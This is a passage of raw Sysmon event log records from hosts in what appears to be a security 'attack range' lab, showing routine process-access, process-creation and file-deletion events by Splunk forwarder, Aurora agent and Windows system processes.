Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=108AFF58EDD2DB5AFE441968AF91E744,SHA256=B3A085F60473F1710531F59330B201D206844D0EDA441E48900902A9C2FCA4C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E53A-63C7-6506-00000000AF02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E53A-63C7-6506-00000000AF02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.401{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E53A-63C7-6506-00000000AF02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.402{FE4C2B44-E53A-63C7-6506-00000000AF02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.354{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=B829C8ACB9C5F374D75BFCD9EC40279C,SHA256=C993F142D21C1DDCD29746ABFD20A102330E5260F8C2C1DA65AE9F8FF1031447,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:30.059{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD2DE579070EEB5E45035B521BC73D8C,SHA256=33DD2F983368DD80626815C9BAF706EC11860A97229D57DABCBC298C1B71795E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017466Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:31.871{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232E4CBF8DB71396DB9D2596B0FAEE1C,SHA256=5B3E6FA4858A098B29F4BE232428EF09F600CFAB8C8F372DF9DBC1C5C8AF7EBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.885{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.797{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:31.774{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 